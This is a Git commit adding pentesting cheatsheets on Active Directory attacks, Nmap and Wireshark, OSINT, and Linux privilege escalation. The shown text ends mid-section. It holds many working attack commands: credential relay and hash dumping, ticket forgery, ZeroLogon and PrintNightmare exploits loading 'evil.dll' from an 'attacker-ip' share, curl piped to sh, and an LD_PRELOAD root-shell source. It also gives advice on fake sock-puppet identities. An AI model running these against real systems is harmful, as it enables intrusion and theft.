djedi/security-cheatsheets
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Added active-directory, network-pentesting, osint, privilege-escalation, web-application-security cheatsheets

Browse source
This commit is contained in:
rpriven 2026-01-04 02:47:19 -07:00
parent 23fffa2874
commit 09fb57770c
Signed by: djedi
GPG key ID: D04DED574622EF45
6 changed files with 2138 additions and 2 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

9
README.md
View file

@ -14,14 +14,20 @@ A collection of security, pentesting, and technical reference cheatsheets.
| Cheatsheet | Description | | Cheatsheet | Description |
|------------|-------------| |------------|-------------|
| [Web Application Security](infosec/web-application-security.md) | OWASP Top 10, SQLi, XSS, SSRF, and web app testing |
| [Network Pentesting](infosec/network-pentesting.md) | Nmap, Wireshark, service enumeration |
| [Privilege Escalation](infosec/privilege-escalation.md) | Linux and Windows privesc techniques |
| [Active Directory](infosec/active-directory.md) | AD attacks, Kerberoasting, BloodHound, lateral movement |
| [OSINT](infosec/osint.md) | Open source intelligence, reconnaissance, dorking |
| [Pentesting Methodology](infosec/pentesting-methodology.md) | Basic methodology for pentesters | | [Pentesting Methodology](infosec/pentesting-methodology.md) | Basic methodology for pentesters |
| [Penetration Testing Reporting](infosec/pentest-reporting.md) | Comprehensive guide for creating professional pentest reports | | [Penetration Testing Reporting](infosec/pentest-reporting.md) | Comprehensive guide for creating professional pentest reports |
| [SOC Analyst Reference](infosec/soc-analyst.md) | Essential knowledge for Security Operations Center analysts | | [SOC Analyst Reference](infosec/soc-analyst.md) | Essential knowledge for Security Operations Center analysts |
| [CTF Jeopardy Guide](infosec/ctf-jeopardy.md) | Techniques for solving common CTF challenge categories | | [CTF Jeopardy Guide](infosec/ctf-jeopardy.md) | Techniques for solving common CTF challenge categories |
| [PJPT Reference Guide](infosec/pjpt-reference.md) | Common commands and techniques for the PJPT certification | | [PJPT Reference Guide](infosec/pjpt-reference.md) | Common commands and techniques for the PJPT certification |
| [CIS 18 Controls](infosec/cis_18_controls.md) | CIS Critical Security Controls reference |
| [Incident Response](infosec/incident-response.md) | Quick techniques for IR |
| [GitHub Commands](infosec/github-commands.md) | Git and GitHub command reference | | [GitHub Commands](infosec/github-commands.md) | Git and GitHub command reference |
| [Command Line Reference](infosec/command-line-reference.md) | Cross-platform CLI commands | | [Command Line Reference](infosec/command-line-reference.md) | Cross-platform CLI commands |
| [Incident Response](infosec/incident-response.md) | Quick techniques for IR |
## AI Security ## AI Security
@ -29,7 +35,6 @@ A collection of security, pentesting, and technical reference cheatsheets.
|------------|-------------| |------------|-------------|
| [AI Pentesting](ai-security/ai-pentesting.md) | Framework for testing and securing AI systems | | [AI Pentesting](ai-security/ai-pentesting.md) | Framework for testing and securing AI systems |
| [Prompt Engineering](ai-security/prompt-engineering.md) | Techniques for effective LLM prompting | | [Prompt Engineering](ai-security/prompt-engineering.md) | Techniques for effective LLM prompting |
| [LLM Security](ai-security/llm-security.md) | Security considerations for large language models |
## Cryptography ## Cryptography

425
infosec/active-directory.md Normal file
View file

@ -0,0 +1,425 @@
# Active Directory Pentesting Cheatsheet
Quick reference for Active Directory enumeration, attacks, and post-exploitation.
---
## AD Overview
### Key Components
| Component | Description |
|-----------|-------------|
| Domain Controller (DC) | Central AD server, holds NTDS.dit |
| NTDS.dit | AD database with all user hashes |
| SYSVOL | Shared folder with GPOs and scripts |
| Kerberos | Authentication protocol |
| LDAP | Directory query protocol |
### Common Ports
| Port | Service |
|------|---------|
| 53 | DNS |
| 88 | Kerberos |
| 135 | RPC |
| 139 | NetBIOS |
| 389 | LDAP |
| 445 | SMB |
| 464 | Kerberos password change |
| 636 | LDAPS |
| 3268 | Global Catalog |
| 3389 | RDP |
---
## Initial Attack Vectors
### LLMNR/NBT-NS Poisoning
**Concept**: Intercept failed DNS lookups to capture NTLMv2 hashes.
```bash
# Start Responder
responder -I eth0 -rdwv
# Wait for authentication attempts...
# Captured hash format: user::domain:challenge:response:ntlmv2
# Crack with hashcat
hashcat -m 5600 hash.txt rockyou.txt
```
**Mitigation**: Disable LLMNR and NBT-NS via GPO.
---
### SMB Relay
**Concept**: Relay captured credentials to another machine (if SMB signing is disabled).
```bash
# 1. Check for SMB signing
crackmapexec smb 192.168.1.0/24 --gen-relay-list targets.txt
# 2. Configure Responder (disable SMB/HTTP)
# Edit /etc/responder/Responder.conf
# SMB = Off
# HTTP = Off
# 3. Start ntlmrelayx
impacket-ntlmrelayx -tf targets.txt -smb2support
# 4. Start Responder
responder -I eth0 -rdwv
# For shell access:
impacket-ntlmrelayx -tf targets.txt -smb2support -i
# Then connect with nc to the specified port
```
---
### IPv6 DNS Takeover
```bash
# mitm6 spoofs as IPv6 DNS server
mitm6 -d domain.local
# Relay with ntlmrelayx
impacket-ntlmrelayx -6 -t ldaps://dc.domain.local -wh fakewpad.domain.local -l loot
```
---
## Post-Compromise Enumeration
### Domain Information
```cmd
# From Windows
net user /domain
net group /domain
net group "Domain Admins" /domain
net group "Enterprise Admins" /domain
```
```powershell
# PowerView
. .\PowerView.ps1
Get-Domain
Get-DomainController
Get-DomainUser
Get-DomainGroup
Get-DomainComputer
```
### BloodHound
```bash
# Install
sudo apt install bloodhound neo4j
# Start neo4j
sudo neo4j console
# Navigate to http://localhost:7474, login neo4j:neo4j, change password
# Start BloodHound
bloodhound
```
```powershell
# Collect data with SharpHound
powershell -ep bypass
. .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All -Domain domain.local -ZipFileName output.zip
```
```bash
# Or use bloodhound-python from Linux
bloodhound-python -u user -p 'password' -d domain.local -ns <DC-IP> -c all
```
**Key Queries**:
- "Find Shortest Paths to Domain Admins"
- "Find Principals with DCSync Rights"
- "List all Kerberoastable Accounts"
---
## Credential Attacks
### Pass the Password
```bash
# Spray password across network
crackmapexec smb 192.168.1.0/24 -u username -d DOMAIN -p 'Password123'
# Check specific hosts
crackmapexec smb 192.168.1.100 -u username -d DOMAIN -p 'Password123'
# Execute command
crackmapexec smb 192.168.1.100 -u user -d DOMAIN -p 'pass' -x 'whoami'
# Get shell with psexec
impacket-psexec DOMAIN/user:'password'@192.168.1.100
```
### Pass the Hash
**Note**: Only NTLM hashes work, not NTLMv2.
```bash
# With CrackMapExec
crackmapexec smb 192.168.1.0/24 -u user -H <NTLM_hash> --local-auth
# Get shell
impacket-psexec user@192.168.1.100 -hashes <LM:NTLM>
impacket-wmiexec user@192.168.1.100 -hashes <LM:NTLM>
# Example (blank LM hash)
impacket-psexec administrator@192.168.1.100 -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
```
### Dumping Hashes
```bash
# With credentials
impacket-secretsdump DOMAIN/user:'password'@192.168.1.100
# With hash
impacket-secretsdump user@192.168.1.100 -hashes <LM:NTLM>
# From DC (DCSync)
impacket-secretsdump DOMAIN/admin:'password'@DC-IP -just-dc-ntlm
```
### Cracking Hashes
```bash
# NTLM hashes
hashcat -m 1000 ntlm_hashes.txt rockyou.txt
# NTLMv2 hashes (from Responder)
hashcat -m 5600 ntlmv2_hashes.txt rockyou.txt
# Kerberos TGS (Kerberoasting)
hashcat -m 13100 tgs_hashes.txt rockyou.txt
# Kerberos AS-REP (AS-REP Roasting)
hashcat -m 18200 asrep_hashes.txt rockyou.txt
```
---
## Kerberos Attacks
### Kerberoasting
**Concept**: Request TGS tickets for SPNs, crack service account passwords offline.
```bash
# Get TGS tickets
impacket-GetUserSPNs DOMAIN/user:password -dc-ip <DC-IP> -request
# Save hash and crack
hashcat -m 13100 tgs_hash.txt rockyou.txt
```
```powershell
# From Windows with Rubeus
.\Rubeus.exe kerberoast /outfile:hashes.txt
```
**Mitigation**: Strong service account passwords, Managed Service Accounts.
---
### AS-REP Roasting
**Concept**: Get AS-REP for accounts without pre-authentication.
```bash
# Find vulnerable accounts and get hashes
impacket-GetNPUsers DOMAIN/ -usersfile users.txt -dc-ip <DC-IP> -format hashcat
# Crack
hashcat -m 18200 asrep_hash.txt rockyou.txt
```
---
### Golden Ticket
**Concept**: Forge TGT with krbtgt hash for persistent domain access.
```bash
# Get krbtgt hash (requires DA)
impacket-secretsdump DOMAIN/admin:password@DC-IP -just-dc-user krbtgt
# Create golden ticket
impacket-ticketer -nthash <krbtgt_hash> -domain-sid <domain_sid> -domain DOMAIN administrator
# Use ticket
export KRB5CCNAME=administrator.ccache
impacket-psexec DOMAIN/administrator@target -k -no-pass
```
---
### Silver Ticket
**Concept**: Forge TGS for specific service with service account hash.
```bash
# Create silver ticket for CIFS (file shares)
impacket-ticketer -nthash <service_hash> -domain-sid <domain_sid> -domain DOMAIN -spn CIFS/target.domain.local user
export KRB5CCNAME=user.ccache
impacket-smbclient //target.domain.local/share -k -no-pass
```
---
## Token Impersonation
```powershell
# Incognito (Meterpreter)
load incognito
list_tokens -u
impersonate_token "DOMAIN\\Administrator"
# With Mimikatz
privilege::debug
token::elevate
```
---
## Mimikatz
```powershell
# Dump credentials
privilege::debug
sekurlsa::logonpasswords
# DCSync attack
lsadump::dcsync /domain:domain.local /user:Administrator
# Pass the hash
sekurlsa::pth /user:admin /domain:domain.local /ntlm:<hash>
# Golden ticket
kerberos::golden /user:Administrator /domain:domain.local /sid:<domain_sid> /krbtgt:<hash> /ptt
# Dump SAM
lsadump::sam
```
---
## Lateral Movement
### PsExec
```bash
impacket-psexec DOMAIN/user:password@target
impacket-psexec user@target -hashes <LM:NTLM>
```
### WMIExec
```bash
impacket-wmiexec DOMAIN/user:password@target
```
### Evil-WinRM
```bash
evil-winrm -i target -u user -p password
evil-winrm -i target -u user -H <NTLM_hash>
```
### SMBExec
```bash
impacket-smbexec DOMAIN/user:password@target
```
---
## Known Vulnerabilities
### ZeroLogon (CVE-2020-1472)
```bash
# Test
python3 zerologon_tester.py DC-NAME DC-IP
# Exploit (resets DC password to empty)
python3 cve-2020-1472-exploit.py DC-NAME DC-IP
# Dump hashes
impacket-secretsdump -just-dc -no-pass DC-NAME\$@DC-IP
```
### PrintNightmare (CVE-2021-1675 / CVE-2021-34527)
```bash
# Check vulnerability
rpcdump.py @DC-IP | grep MS-RPRN
rpcdump.py @DC-IP | grep MS-PAR
# Exploit
python3 CVE-2021-1675.py DOMAIN/user:password@DC-IP '\\attacker-ip\share\evil.dll'
```
### noPac (CVE-2021-42278 / CVE-2021-42287)
```bash
# Scanner
python3 scanner.py DOMAIN/user:password -dc-ip DC-IP
# Exploit
python3 noPac.py DOMAIN/user:password -dc-ip DC-IP -shell
```
---
## Useful Tools
| Tool | Purpose |
|------|---------|
| CrackMapExec | Swiss army knife for AD |
| Impacket | Python AD tools suite |
| BloodHound | AD attack path visualization |
| Mimikatz | Credential extraction |
| Rubeus | Kerberos abuse |
| PowerView | PowerShell AD recon |
| Evil-WinRM | WinRM shell |
| Responder | LLMNR/NBT-NS poisoning |
| kerbrute | Kerberos brute forcing |
---
## Attack Flow
```
1. LLMNR/NBT-NS Poisoning
2. Crack hashes / Relay attacks
3. Enumerate with BloodHound
4. Kerberoast service accounts
5. Lateral movement (Pass the Hash/Password)
6. Find path to Domain Admin
7. DCSync for all hashes
8. Golden Ticket for persistence
```
---
## Resources
- [WADComs](https://wadcoms.github.io/) - AD command reference
- [HackTricks AD](https://book.hacktricks.xyz/windows-hardening/active-directory-methodology)
- [PayloadsAllTheThings AD](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md)
- [The Hacker Recipes](https://www.thehacker.recipes/)
- [ired.team](https://www.ired.team/)

425
infosec/network-pentesting.md Normal file
View file

@ -0,0 +1,425 @@
# Network Pentesting Cheatsheet
Quick reference for network reconnaissance, port scanning, and traffic analysis.
---
## Nmap
### Basic Scans
```bash
# Quick scan
nmap <target>
# Version detection
nmap -sV <target>
# OS detection
nmap -O <target>
# Aggressive scan (OS, version, scripts, traceroute)
nmap -A <target>
# All ports
nmap -p- <target>
# Specific ports
nmap -p 80,443,8080 <target>
# Port range
nmap -p 1-1000 <target>
```
### Scan Types
```bash
# TCP SYN (stealth) - default, requires root
nmap -sS <target>
# TCP connect - no root needed
nmap -sT <target>
# UDP scan
nmap -sU <target>
# Combined TCP/UDP
nmap -sS -sU <target>
# NULL scan (no flags)
nmap -sN <target>
# FIN scan
nmap -sF <target>
# Xmas scan (URG, PSH, FIN)
nmap -sX <target>
```
### Speed and Timing
```bash
# Timing templates (0=paranoid, 5=insane)
nmap -T0 <target> # Slowest, IDS evasion
nmap -T3 <target> # Normal (default)
nmap -T4 <target> # Aggressive
nmap -T5 <target> # Fastest
# Rate limiting
nmap --min-rate 1000 <target>
nmap --max-rate 100 <target>
```
### Output Formats
```bash
# Normal output
nmap -oN scan.txt <target>
# Grepable output
nmap -oG scan.grep <target>
# XML output
nmap -oX scan.xml <target>
# All formats
nmap -oA scan <target>
```
### NSE Scripts
```bash
# Default scripts
nmap -sC <target>
nmap --script=default <target>
# Specific script
nmap --script=http-title <target>
# Script categories
nmap --script=vuln <target>
nmap --script=safe <target>
nmap --script=discovery <target>
# Multiple scripts
nmap --script=http-title,http-headers <target>
# Wildcard
nmap --script=http-* <target>
# Script help
nmap --script-help=http-title
```
### Common Script Categories
| Category | Description |
|----------|-------------|
| auth | Authentication bypass |
| broadcast | Network discovery |
| brute | Brute force attacks |
| default | Safe, useful scripts |
| discovery | Information gathering |
| exploit | Exploit vulnerabilities |
| fuzzer | Fuzzing tests |
| safe | Won't crash targets |
| vuln | Vulnerability scanning |
### Firewall Evasion
```bash
# Fragment packets (8 bytes)
nmap -f <target>
# Fragment packets (16 bytes)
nmap -ff <target>
# Custom MTU (must be multiple of 8)
nmap --mtu 24 <target>
# Decoy scan
nmap -D RND:10 <target>
nmap -D decoy1,decoy2,ME <target>
# Spoof source port
nmap -g 53 <target>
nmap --source-port 80 <target>
# Skip ping (assume host is up)
nmap -Pn <target>
# Custom user agent
nmap --script-args http.useragent="Mozilla/5.0" <target>
# Scan delay (evade rate limiting)
nmap --scan-delay 1s <target>
# Bad checksum (test firewall response)
nmap --badsum <target>
```
### Host Discovery
```bash
# Ping sweep
nmap -sn 192.168.1.0/24
# ARP scan (local network)
nmap -PR 192.168.1.0/24
# List scan (no probe, DNS only)
nmap -sL 192.168.1.0/24
# TCP SYN ping
nmap -PS22,80,443 <target>
# TCP ACK ping
nmap -PA80,443 <target>
# UDP ping
nmap -PU53 <target>
```
### Favorite Commands
```bash
# Comprehensive scan
nmap -A -vv -sV -sC <target> -oA scan
# OSCP-style initial
nmap -sV -sC -oN initial.txt <target>
# Full port scan
nmap -T4 -sS -Pn -p- -oN allports.txt <target>
# Quick top 1000
nmap -sV -sC -T4 <target>
# Vuln scan
nmap --script=vuln -oN vulns.txt <target>
```
---
## Wireshark
### Display Filters
#### IP Filtering
```
ip.addr == 192.168.1.1 # Traffic to/from IP
ip.src == 192.168.1.1 # Source IP
ip.dst == 192.168.1.1 # Destination IP
ip.addr == 192.168.1.0/24 # Subnet
ip.addr != 192.168.1.1 # Exclude IP
```
#### Port Filtering
```
tcp.port == 80 # TCP port 80
udp.port == 53 # UDP port 53
tcp.port == 80 || tcp.port == 443 # HTTP or HTTPS
tcp.dstport == 443 # Destination port
tcp.srcport == 8080 # Source port
```
#### Protocol Filtering
```
http # HTTP traffic
dns # DNS traffic
tcp # TCP traffic
udp # UDP traffic
icmp # ICMP traffic
arp # ARP traffic
ssl || tls # Encrypted traffic
```
#### TCP Flags
```
tcp.flags.syn == 1 # SYN packets
tcp.flags.syn == 1 && tcp.flags.ack == 0 # SYN only
tcp.flags.reset == 1 # RST packets
tcp.flags == 0x002 # SYN flag
tcp.flags == 0x012 # SYN-ACK
```
#### HTTP Filtering
```
http.request # HTTP requests
http.response # HTTP responses
http.request.method == "GET" # GET requests
http.request.method == "POST" # POST requests
http.host contains "google" # Host contains
http.response.code == 200 # Status code
http.request.uri contains "login" # URI contains
```
#### Content Filtering
```
frame contains "password" # Frame contains string
http contains "admin" # HTTP contains
tcp contains "secret" # TCP contains
```
### Analysis Filters
```
# Bad TCP
tcp.analysis.flags && !tcp.analysis.window_update
# Retransmissions
tcp.analysis.retransmission
# Slow round trip
tcp.analysis.initial_rtt > 1
# TCP delays
tcp.time_delta > 0.1
# Slow HTTP
http.time > 0.025
# Slow DNS
dns.time > 1
# Suspicious TTL
ip.ttl < 50 && ip.ttl > 30
# Filter out noise
!(eth.addr == ff:ff:ff:ff:ff:ff || arp || icmp || stp || cdp || lldp)
```
### Special Operators
```
contains # Substring match (case-sensitive)
matches # Regex match
in {range} # Range match
```
#### Examples
```
frame contains "google"
http.host matches "\.(org|com|net)"
tcp.port in {80 443 8000..8004}
```
### CLI Tools
#### dumpcap
```bash
# List interfaces
dumpcap -D
# Capture on interface
dumpcap -i 1 -w capture.pcapng
# Ring buffer (10 files, 500MB each)
dumpcap -i 1 -w capture.pcapng -b filesize:500000 -b files:10
```
#### tcpdump
```bash
# Capture all traffic
tcpdump -i eth0
# Capture to file
tcpdump -i eth0 -w capture.pcap
# Read from file
tcpdump -r capture.pcap
# Filter by host
tcpdump host 192.168.1.1
# Filter by port
tcpdump port 80
# Filter by protocol
tcpdump icmp
tcpdump tcp
# Verbose output
tcpdump -v -i eth0
tcpdump -vvv -i eth0
```
#### tshark
```bash
# Capture
tshark -i eth0 -w capture.pcap
# Read and filter
tshark -r capture.pcap -Y "http"
# Extract fields
tshark -r capture.pcap -T fields -e ip.src -e ip.dst
```
---
## Service Enumeration
### Common Ports
| Port | Service | Enumeration |
|------|---------|-------------|
| 21 | FTP | `nmap --script=ftp-* -p21` |
| 22 | SSH | `nmap --script=ssh-* -p22` |
| 23 | Telnet | `nmap --script=telnet-* -p23` |
| 25 | SMTP | `nmap --script=smtp-* -p25` |
| 53 | DNS | `nmap --script=dns-* -p53` |
| 80 | HTTP | `nmap --script=http-* -p80` |
| 110 | POP3 | `nmap --script=pop3-* -p110` |
| 139/445 | SMB | `nmap --script=smb-* -p139,445` |
| 143 | IMAP | `nmap --script=imap-* -p143` |
| 443 | HTTPS | `nmap --script=ssl-*,http-* -p443` |
| 3306 | MySQL | `nmap --script=mysql-* -p3306` |
| 3389 | RDP | `nmap --script=rdp-* -p3389` |
| 5432 | PostgreSQL | `nmap --script=pgsql-* -p5432` |
### SMB Enumeration
```bash
# Enum shares
smbclient -L //<target> -N
nmap --script=smb-enum-shares -p445 <target>
# Connect to share
smbclient //<target>/share -U username
# Enum users
nmap --script=smb-enum-users -p445 <target>
# Check for vulnerabilities
nmap --script=smb-vuln-* -p445 <target>
# CrackMapExec
crackmapexec smb <target>
crackmapexec smb <target> --shares
crackmapexec smb <target> -u user -p pass
```
### DNS Enumeration
```bash
# Zone transfer
dig axfr @<dns-server> <domain>
nmap --script=dns-zone-transfer -p53 <dns-server>
# Reverse lookup
dig -x <ip>
# DNS brute force
nmap --script=dns-brute <domain>
```
---
## Useful Tools
| Tool | Purpose |
|------|---------|
| nmap | Port scanning, service detection |
| masscan | Fast port scanning |
| Wireshark | Packet analysis |
| tcpdump | CLI packet capture |
| netcat | Network Swiss army knife |
| CrackMapExec | SMB/AD enumeration |
| enum4linux | SMB/Samba enumeration |
| Responder | LLMNR/NBT-NS poisoning |
---
## Resources
- [Nmap Book](https://nmap.org/book/)
- [Nmap Scripting Engine](https://nmap.org/nsedoc/)
- [Wireshark User Guide](https://www.wireshark.org/docs/wsug_html/)
- [Wireshark Display Filters](https://wiki.wireshark.org/DisplayFilters)

405
infosec/osint.md Normal file
View file

@ -0,0 +1,405 @@
# OSINT Cheatsheet
Quick reference for Open Source Intelligence gathering, reconnaissance, and information discovery.
---
## Search Engine Operators
### Google Dorking
| Operator | Description | Example |
|----------|-------------|---------|
| `site:` | Search within site | `site:example.com` |
| `filetype:` | Find file types | `filetype:pdf` |
| `intitle:` | Search in title | `intitle:"index of"` |
| `inurl:` | Search in URL | `inurl:admin` |
| `intext:` | Search in body | `intext:password` |
| `cache:` | Cached version | `cache:example.com` |
| `"..."` | Exact match | `"admin login"` |
| `*` | Wildcard | `"admin * password"` |
| `-` | Exclude | `site:example.com -www` |
| `OR` | Either term | `admin OR login` |
| `..` | Number range | `$100..$500` |
### Useful Dorks
```
# Find exposed directories
intitle:"index of" "parent directory"
# Find login pages
inurl:login OR inurl:admin OR inurl:portal
# Find exposed files
site:example.com filetype:pdf OR filetype:doc OR filetype:xls
# Find config files
filetype:env OR filetype:cfg OR filetype:conf
# Find backup files
filetype:bak OR filetype:old OR filetype:backup
# Find exposed databases
filetype:sql "insert into" OR "create table"
# Find credentials
intext:password filetype:log
"username" "password" filetype:csv
# Find vulnerable pages
inurl:php?id=
inurl:index.php?id=
```
### Other Search Engines
- **Bing**: Similar operators, sometimes different results
- **DuckDuckGo**: Privacy-focused, `site:`, `filetype:`
- **Yandex**: Better for Russian/Eastern European content
- **Baidu**: Chinese content
---
## Domain & Website OSINT
### DNS & Whois
```bash
# Whois lookup
whois example.com
# DNS records
dig example.com ANY
dig example.com MX
dig example.com TXT
nslookup -type=any example.com
# Zone transfer (if allowed)
dig axfr @ns1.example.com example.com
```
### Online Tools
| Tool | URL | Purpose |
|------|-----|---------|
| ViewDNS | viewdns.info | DNS, IP, whois |
| SecurityTrails | securitytrails.com | Historical DNS |
| DNSDumpster | dnsdumpster.com | DNS recon |
| crt.sh | crt.sh | Certificate transparency |
| Shodan | shodan.io | Internet-connected devices |
| Censys | censys.io | Similar to Shodan |
| BuiltWith | builtwith.com | Technology profiler |
| Wappalyzer | wappalyzer.com | Tech detection |
| Wayback Machine | web.archive.org | Historical snapshots |
### Subdomain Enumeration
```bash
# Amass
amass enum -d example.com
# Subfinder
subfinder -d example.com
# Sublist3r
sublist3r -d example.com
# Certificate transparency
curl -s "https://crt.sh/?q=%.example.com&output=json" | jq -r '.[].name_value' | sort -u
# DNS brute force
gobuster dns -d example.com -w wordlist.txt
```
### Technology Detection
```bash
# Whatweb
whatweb example.com
# Wappalyzer CLI
wappalyzer https://example.com
```
---
## Email OSINT
### Email Verification
| Tool | URL |
|------|-----|
| Hunter.io | hunter.io |
| EmailHippo | emailhippo.com |
| Verify Email | verify-email.org |
| Email-Checker | email-checker.net |
### Email Discovery
```bash
# theHarvester
theHarvester -d example.com -b all
# Hunter.io API
curl "https://api.hunter.io/v2/domain-search?domain=example.com&api_key=YOUR_KEY"
```
### Email Header Analysis
| Tool | URL |
|------|-----|
| MXToolbox | mxtoolbox.com/EmailHeaders.aspx |
| Google Admin Toolbox | toolbox.googleapps.com/apps/messageheader |
---
## Username & People OSINT
### Username Search
| Tool | URL | Purpose |
|------|-----|---------|
| Namechk | namechk.com | Username availability |
| WhatsMyName | whatsmyname.app | Cross-platform search |
| Sherlock | github.com/sherlock-project | CLI username search |
| Maigret | github.com/soxoj/maigret | Sherlock alternative |
```bash
# Sherlock
python3 sherlock username
# Maigret
maigret username
```
### People Search
| Tool | Purpose |
|------|---------|
| Pipl | People search engine |
| Spokeo | US people search |
| BeenVerified | Background checks |
| ThatsThem | Free people search |
| TruePeopleSearch | Free US lookup |
| Webmii | Aggregated web presence |
### Social Media
| Platform | OSINT Approach |
|----------|----------------|
| LinkedIn | Company employees, roles, connections |
| Twitter/X | Public posts, followers, connections |
| Facebook | Public profiles, photos, check-ins |
| Instagram | Photos, locations, stories |
| GitHub | Code, email in commits, contributions |
---
## Image OSINT
### Reverse Image Search
| Tool | URL |
|------|-----|
| Google Images | images.google.com |
| TinEye | tineye.com |
| Yandex Images | yandex.com/images |
| Bing Images | bing.com/images |
### Metadata Extraction
```bash
# ExifTool
exiftool image.jpg
# View GPS coordinates
exiftool -gpslatitude -gpslongitude image.jpg
# Remove metadata
exiftool -all= image.jpg
```
### Geolocation
| Tool | URL |
|------|-----|
| GeoGuessr | geoguessr.com |
| Google Earth | earth.google.com |
| Mapillary | mapillary.com |
| SunCalc | suncalc.org |
---
## Password & Breach OSINT
### Breach Databases
| Tool | URL | Notes |
|------|-----|-------|
| Have I Been Pwned | haveibeenpwned.com | Check if email breached |
| DeHashed | dehashed.com | Paid breach search |
| LeakCheck | leakcheck.io | Email/username search |
| IntelX | intelx.io | Multiple data types |
| Snusbase | snusbase.com | Breach database |
### Password Policy Discovery
```bash
# Check password policies in AD
crackmapexec smb target -u user -p pass --pass-pol
```
---
## Business & Company OSINT
### Company Information
| Tool | URL | Purpose |
|------|-----|---------|
| OpenCorporates | opencorporates.com | Global company database |
| Crunchbase | crunchbase.com | Startup/company info |
| LinkedIn | linkedin.com | Employees, structure |
| SEC EDGAR | sec.gov/edgar | US public filings |
| Companies House | companieshouse.gov.uk | UK company data |
### Financial
| Tool | URL |
|------|-----|
| Bloomberg | bloomberg.com |
| Yahoo Finance | finance.yahoo.com |
| Google Finance | google.com/finance |
---
## Network & Infrastructure OSINT
### Shodan
```bash
# CLI
shodan search "hostname:example.com"
shodan host 1.2.3.4
# Common queries
org:"Target Company"
hostname:example.com
port:22
product:Apache
ssl.cert.subject.cn:example.com
```
### Censys
```bash
# Search syntax
services.http.response.html_title:"Example"
ip:1.2.3.4
autonomous_system.name:"Example ISP"
```
### BGP & ASN
| Tool | URL |
|------|-----|
| BGP.he.net | bgp.he.net |
| ASN Lookup | asnlookup.com |
| BGPView | bgpview.io |
---
## Wireless OSINT
| Tool | URL | Purpose |
|------|-----|---------|
| Wigle | wigle.net | WiFi network database |
| WifiMap | wifimap.io | WiFi passwords |
---
## OSINT Tools - CLI
### theHarvester
```bash
# All sources
theHarvester -d example.com -b all
# Specific sources
theHarvester -d example.com -b google,linkedin,twitter
```
### Recon-ng
```bash
# Start
recon-ng
# Install modules
marketplace search
marketplace install all
# Set workspace
workspaces create example
db insert domains
domains add example.com
# Run modules
modules load recon/domains-hosts/hackertarget
run
```
### SpiderFoot
```bash
# Run scan
spiderfoot -s example.com -o output.html
```
### Maltego
- GUI-based relationship mapping
- Entity transformations
- Visualize connections
---
## OSINT Workflow
```
1. Define scope and objectives
2. Passive reconnaissance
- Search engines
- Social media
- Public records
3. Domain/Infrastructure
- DNS, Whois
- Subdomains
- Technology stack
4. People/Organization
- Employees
- Email addresses
- Usernames
5. Breach data
- Exposed credentials
- Data leaks
6. Document findings
- Organize data
- Create report
```
---
## Sock Puppets
### Creating Fake Identities
- Use AI-generated photos (thispersondoesnotexist.com)
- Create dedicated email (ProtonMail)
- Use VPN/Tor
- Build history over time
- Keep consistent persona
### Operational Security
- Separate browser/profile
- No real personal info
- Different IP addresses
- Avoid linking accounts
---
## Resources
### Websites
- [OSINT Framework](https://osintframework.com/)
- [IntelTechniques](https://inteltechniques.com/)
- [OSINT Dojo](https://www.osintdojo.com/)
- [Bellingcat](https://www.bellingcat.com/)
### Books
- "Open Source Intelligence Techniques" by Michael Bazzell
- "The OSINT Handbook" by Dale Meredith
### Training
- [TCM Security OSINT Fundamentals](https://academy.tcm-sec.com/)
- [SANS SEC487](https://www.sans.org/cyber-security-courses/open-source-intelligence-gathering/)

539
infosec/privilege-escalation.md Normal file
View file

@ -0,0 +1,539 @@
# Privilege Escalation Cheatsheet
Quick reference for Linux and Windows privilege escalation techniques.
---
# Linux Privilege Escalation
## Initial Enumeration
### System Information
```bash
# Who am I?
whoami
id
# Hostname and kernel
hostname
uname -a
cat /proc/version
cat /etc/issue
# Architecture
lscpu
# Running processes
ps aux
ps aux | grep root
```
### User Enumeration
```bash
# Current user privileges
sudo -l
# List users
cat /etc/passwd
cat /etc/passwd | cut -d: -f1
# Password hashes (if readable)
cat /etc/shadow
# Groups
cat /etc/group
# Command history
history
cat ~/.bash_history
```
### Network Enumeration
```bash
# IP address
ifconfig
ip a
# Routes
ip route
route -n
# ARP table
arp -a
ip neigh
# Open ports
netstat -ano
ss -tulpn
# Active connections
netstat -antup
```
### Password Hunting
```bash
# Search for passwords
grep --color=auto -rnw '/' -ie "PASSWORD=" 2>/dev/null
grep --color=auto -rnw '/' -ie "PASS=" 2>/dev/null
# Find password files
locate password | more
find / -name "*.txt" -exec grep -l "password" {} \; 2>/dev/null
# SSH keys
find / -name authorized_keys 2>/dev/null
find / -name id_rsa 2>/dev/null
find / -name id_dsa 2>/dev/null
# Config files
find / -name "*.conf" 2>/dev/null | xargs grep -l "pass" 2>/dev/null
```
---
## Automated Tools
```bash
# LinPEAS
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
# LinEnum
./LinEnum.sh -t
# linux-exploit-suggester
./linux-exploit-suggester.sh
# pspy (process monitoring)
./pspy64
```
---
## Kernel Exploits
```bash
# Check kernel version
uname -r
uname -a
# Search for exploits
searchsploit linux kernel <version>
searchsploit linux kernel 4.4
# Common kernel exploits
# Dirty COW (CVE-2016-5195) - Linux < 4.8.3
# DirtyCred (CVE-2022-2588)
```
---
## Sudo Abuse
### Check Sudo Permissions
```bash
sudo -l
```
### GTFOBins Exploitation
```bash
# vim
sudo vim -c ':!/bin/sh'
# awk
sudo awk 'BEGIN {system("/bin/bash")}'
# find
sudo find . -exec /bin/sh \; -quit
# less/more
sudo less /etc/passwd
!/bin/sh
# nmap (old versions)
sudo nmap --interactive
!sh
# python
sudo python -c 'import os; os.system("/bin/sh")'
# perl
sudo perl -e 'exec "/bin/sh";'
# ruby
sudo ruby -e 'exec "/bin/sh"'
```
### LD_PRELOAD
```bash
# If sudo -l shows: env_keep+=LD_PRELOAD
# Create malicious shared object:
# shell.c
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/bash");
}
# Compile and execute
gcc -fPIC -shared -o shell.so shell.c -nostartfiles
sudo LD_PRELOAD=/tmp/shell.so <allowed_program>
```
### Sudo CVEs
```bash
# CVE-2019-14287 (sudo < 1.8.28)
